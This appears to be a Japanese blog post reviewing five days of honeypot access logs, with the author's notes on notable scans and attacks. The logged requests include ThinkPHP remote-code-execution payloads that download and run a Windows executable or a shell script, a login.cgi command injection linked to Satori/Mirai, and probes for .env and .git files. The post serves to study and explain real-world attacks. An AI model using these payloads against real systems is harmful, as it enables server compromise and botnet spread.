5/1~5/5 5日分を見ていきたいと思います。

アクセス先

GET http://www.ceek.jp/?rands=[]
GET http://www.baidu.com
GET http://www.google.com/
GET /manager/html  
GET /.env 
GET /admin/assets/js/views/login.js
GET /favicon.ico
GET /sitemap.xml
GET /.git/config
GET http://[感染サイトのため伏]/echo.php
GET /upload/bank-icons/bank-gh.jpg 
GET /upload/bank-icons/bank_16.png
GET /TP/public/index.php
GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
GET /nx8j78af1b.jsp
GET /login.cgi?cli=aa%20aa%27;wget%20http://[↓]/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$  *1


GET /script
GET http://[]/testget?q=23333&port=80   *2


GET /.well-known/security.txt
GET /Lists/admin.php
GET /wp-login.php
GET ///?author=1
GET ///wp-json/wp/v2/users/

GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://[]/download.exe','C:/Windows/temp/ztlkmociezbzjeo31521.exe');start%20C:/Windows/temp/ztlkmociezbzjeo31521.exe  *3

GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://[]/download.exe','C:/Windows/temp/ztlkmociezbzjeo31521.exe');start%20C:/Windows/temp/ztlkmociezbzjeo31521.exe

GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20http://[]/a_thk.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a  *4


GET /w00tw00t.at.blackhats.romanian.anti-sec:)
GET /phpMyAdmin/scripts/setup.php
GET /pma/scripts/setup.php
GET /phpmy/scripts/setup.php
GET /MyAdmin/scripts/setup.php
GET /console/login/LoginForm.jsp
GET http://api.ipify.org/
GET http://www.123cha.com/
GET http://www.ip.cn/
GET /blog/wp-includes/wlwmanifest.xml
GET /wordpress/wp-includes/wlwmanifest.xml
GET /jmx-console/
GET /HNAP1/
GET ttp[]//azenv.net/
GET /admin-scripts.asp




POST /TP/public/index.php?s=captcha
POST /tmUnblock.cgi
POST /users?page=&size=5

CONNECT www.google.com:443
CONNECT www.baidu.com:443
CONNECT cn.bing.com:443

PUT /FxCodeShell.jsp::$DATA
HEAD /robots.txt
OPTIONS /

(virus total 1VirusTotal

2VirusTotal, 3VirusTotal, 4VirusTotal)

考察

このログと考察を書く時間がだいぶずれてしまったので、当時何を書こうか思い出せない状態ですが、 パッと見たところ気になるものを書いてみたいと思います。

1.GET /sitemap.xml

サイトマップのチェック サイトマップとは（サイトマップについて - Search Console ヘルプ）

2.GET /public/index.php?s=index/think\app/invokefunction~

Think PHP というフレームワークへの攻撃 中国で割とポピュラーなフレームワークの脆弱性らしい 詳しくはここ

www.exploit-db.com

や

ThinkPHPという中国のフレームワークの脆弱性が狙われて、中国の45000のサイトが攻撃を受け続けている - orangeitems’s diary この方のブログに詳しく乗っています。 結構大きい攻撃ということがわかりますね。 恐ろしいというか気持ち悪いというか。。。

3.GET /login.cgi?cli=aa%20aa%27;wget%20http~

satoriっぽいです。Mirai亜種とか言われていますね。 攻撃に成功した場合、ボットネットを構築されてしまう。つまりMirai同様拡散されていくタイプですね。 攻撃の内容については、別記事で自分なりにリサーチしてみたいと思っています。 まあ調べればほかの方が調べた記事などが出てくるので詳しく知りたい方はそちらを 参照してもらえばと思います。

4.GET http:///testget?q=23333&port=80

悪意のあるスクリプトを動かそうとしているのだと思います。 普通にVirusTotalではmaliciousの判定になった。 詳しいことはわかりませんが'23333'は日本語で言うところの'爆笑'みたいな 中国のスラングっぽい。

5.GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=cmd.exe%20/c%20powershell~

明らかに攻撃しているのがわかります。　途中で切っていますが 先ほど挙げたThinkPHPへの攻撃から始まり、powershellを起動しマルウェアを ダウンロードしようとしているのだと思います。 Windowsを狙った攻撃のように見えますね。 ztlkmociezbzjeo31521.exeはよくわからない。詳しく解析する必要があります。

6.GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient)~

上同様ThinkPHPの脆弱性を利用した攻撃を踏まえてのさらなる攻撃っぽいです。

7.GET /w00tw00t.at.blackhats.romanian.anti-sec:)

phpMyAdminへの攻撃。 とにかく沢山来ます。 詳しくは ozuma.hatenablog.jp この方のブログがとても分かりやすいです。

感想

とにかく不正中継やphpMyAdminを狙った攻撃など、多い攻撃のパターンがわかってきました。その中に少し真新しいのがある感じかな。 ログが沢山溜まってきたので面白そうなものがあったらそれだけについての記事なども書いてみたいです。　普通に解析楽しいです。

今回はこんな感じで終わりにします。